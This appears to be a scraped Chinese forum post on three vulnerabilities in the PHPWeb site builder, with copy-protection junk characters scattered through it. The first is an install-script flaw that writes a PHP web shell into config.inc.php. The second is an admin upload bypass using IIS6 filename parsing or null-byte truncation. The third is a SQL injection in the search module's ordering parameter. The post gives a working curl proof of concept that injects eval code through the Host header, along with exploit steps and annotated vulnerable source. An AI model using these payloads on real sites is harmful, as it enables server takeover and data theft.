phpweb成品网站最新版(注入、上传、写shell)

admin

注入：
9 o  e% U# G. X! k# M0 w% s7 ^1 [7 H
之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码

" N  l' b8 t# S. a5 I/ J鸡肋1： 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
鸡肋2： 有一定安全常识的站长都会删掉 install 目录

: {( Q9 w/ G) g# U虽然鸡肋 但也有优点 ： 不受 magic_quotes_gpc 、 webserver 影响
& ~; c" J1 p) b5 \
4 j, e7 c; t/ N  j3 L/ Z: F分析：
* H. l' `$ o. c9 S7 G
! w1 y4 X9 c% a: M& a
6 n" r. k+ R& l, ~9 I( f3 f$siteurl="http://".$_SERVER["HTTP_HOST"]."/";    //未过滤
. G' m" H8 r0 x% i0 ?+ q( h3 M
; u6 U3 w3 b; ^) a4 s                                            $filestr = fread(fopen($SysConfigFile, 'r'),30000);
2 x" \1 i; E: V% X; E4 [4 r$ o                                            $filestr=str_replace(" ","",$filestr);
) J  n5 y; _1 ~1 a" {! P6 g                                            $filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
                                            $filestr=str_replace("DefaultDbName",$dbname,$filestr);
                                            $filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
                                            $filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
                                            $filestr=str_replace("DefaultsLan","zh_cn",$filestr);
( r3 G* ?; H" [' r                                            $filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
                                            $filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);

                                            fwrite(fopen($ConFile,"w"),$filestr,30000);
$ X0 R. M" V' d& W7 Q$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^

1 T: |2 f+ P; P9 gpoc：

?
1
3 D$ a" r2 G; P  ccurl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
shell地址: /config.inc.php
跟之前的 phpcms一样 需要远程数据库

$ L+ a% U5 ]6 h3 o  O9 B1 i——————————————————–
% p+ @. U( i$ N$ A: @: z上传漏洞(需要进后台)：
! D8 _% K/ n- G( T. `! a漏洞文件: /kedit/upload_cgi/upload.php
这个很多人都知道,但是很鸡肋 iis6 解析 或 GPC off条件下才可利用


* S9 R4 m; B2 A% w& c* q, g8 h<?php
    define("ROOTPATH", "../../");
7 c: n# l5 y9 E! S% @  ^, N" d    include(ROOTPATH."includes/admin.inc.php");
    NeedAuth(0);

    $dt=date("Ymd",time());
    if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
$ U0 a2 E- k+ m7 v: n            @mkdir(ROOTPATH.$_POST['attachPath'].$dt,0777);
    }
* @2 u. {) X2 m* q  R/ |
    //文件保存目录路径
    $save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';
    echo $save_path;
    //文件保存目录URL
    $save_url = '../../'.$_POST['attachPath'].$dt.'/';
! j- p" y: T7 }/ d9 n! J
# r8 `1 X* F' r/ l    //定义允许上传的文件扩展名
7 K" k2 A4 c9 \" K  }5 p' q3 \8 V    $ext_arr = array('gif','jpg','png','bmp'); //限制后缀

    //最大文件大小
0 h% ?. d1 ?% |. ^    $max_size = 1000000;
4 C0 d" B9 s- h8 F
    //更改目录权限
6 Q% L- _4 b5 V  a8 U6 u" N9 s7 V    @mkdir($save_path, 0777);

    //文件的全部路径
8 o% W8 {) o7 q% x* j    $file_path = $save_path.$_POST['fileName'];   //保存文件名

    //文件URL
4 S+ e3 p6 c3 h7 j    $file_url = $save_url.$_POST['fileName'];
1 I: I/ i* s* S//有上传文件时
    if (empty($_FILES) === false) {

! G: T6 p- I" \' s$ n7 x* x            //原文件名
2 I( P% j; p. r4 }) S" F            $file_name = $_FILES['fileData']['name'];
            //服务器上临时文件名
            $tmp_name = $_FILES['fileData']['tmp_name'];
4 y2 Y7 }+ A$ c( t* o+ Z3 u! ?            //文件大小
3 X  _5 [/ z9 O: C) G            $file_size = $_FILES['fileData']['size'];
  Y) y+ P6 ]8 c" \! T            //检查目录
  t. \: C# P: \0 \- B            if (@is_dir($save_path) === false) {
) u- h/ \! N: v) m! [, U, a/ ?                    alert("上传目录不存在。");
) [/ N8 x* d: V& v% a/ M3 K1 u            }
5 L' D" ?" a* x. @7 w            //检查目录写权限
            if (@is_writable($save_path) === false) {
                    alert("上传目录没有写权限。");
            }
0 C7 {& j2 i4 P$ U% G* D: z            //检查是否已上传
) y" Z2 P7 z# T- ]. V, F- p            if (@is_uploaded_file($tmp_name) === false) {
7 D% x# U. j5 a$ d4 N* s                    alert("临时文件可能不是上传文件。");
$ K6 m5 G- U: J( b! [2 ]  m            }
            //检查文件大小
            if ($file_size > $max_size) {
                    alert("上传文件大小超过限制。");
            }
            //获得文件扩展名
' m* L( W& M) s9 n  u+ h6 U            $temp_arr = explode(".", $_POST['fileName']);
            $file_ext = array_pop($temp_arr);
/ O! q. T/ K! U! g* e            $file_ext = trim($file_ext);
            $file_ext = strtolower($file_ext);

            //检查扩展名   
            if (in_array($file_ext, $ext_arr) === false) {     
                    alert("上传文件扩展名是不允许的扩展名。");
            }
  c# h3 M' }- \4 O
            //移动文件   
" ]& m! O$ w2 v6 S/ e            //未重命名 虽然过滤了 后缀   iis 6解析漏洞 ^ _ ^
% e( Y1 {+ p) A6 Y* }$ |+ p) S% P- F, ?            if (move_uploaded_file($tmp_name, $file_path) === false) {
                    alert("上传文件失败。");
            }

            @chmod($file_path,0666);
$ N  _5 P! M  p# a
1 C0 t% M, h/ S5 x3 @+ O( J! y5 M    ?>
5 \4 s# S2 e7 `7 W, h抓包改包 filename 改为 xx.php;111.jpg 即可突破或者使用http://www.0day5.com/?p=227

apache 版本magic_quotes_gpc = off情况下可以考虑 \00 截断 绕过
7 b9 d- B2 u4 }
——————————————————
# C% x- x! l, o* V# v注入漏洞：
漏洞文件:search/module/search.php
/search/index.php?key=1&myord=1 [sqlinjection]

. p3 d1 I+ Y$ g( Q: ]4 l
2 M9 m1 J) n5 `; P( Q# H2 w: o0 J9 l<?php
   //       ... 省略 n 行...
4 E( J# ^  i& y   //第18行:
6 J0 K0 q# {! ]/ T6 r* c           $key=htmlspecialchars($_GET["key"]);   //只是简单的将字符HTML 实体 编码   , mysql 注入不受此影响
           $page=htmlspecialchars($_GET["page"]);
           $myord=htmlspecialchars($_GET["myord"]);

: [1 v3 q- s' U/ |6 O  ]' e   //       ... 省略 n 行...
   $key,$myord 两个参数带入查询
   //第47行 $key:

   $fsql->query("select count(id) from {P}_news_con where iffb='1' and catid!='0' and (title regexp '$key' or body regexp '$key')");  //虽然带入查询 但使用的 是regexp 不知如何绕过..

   //第197行 $myord
) [& E5 W+ u7 ~% W1 r- {   $fsql->query($scl . " order by $myord desc limit $pagelimit ");    产生注入
( c0 `0 Q% \" W3 p/ }
   ?>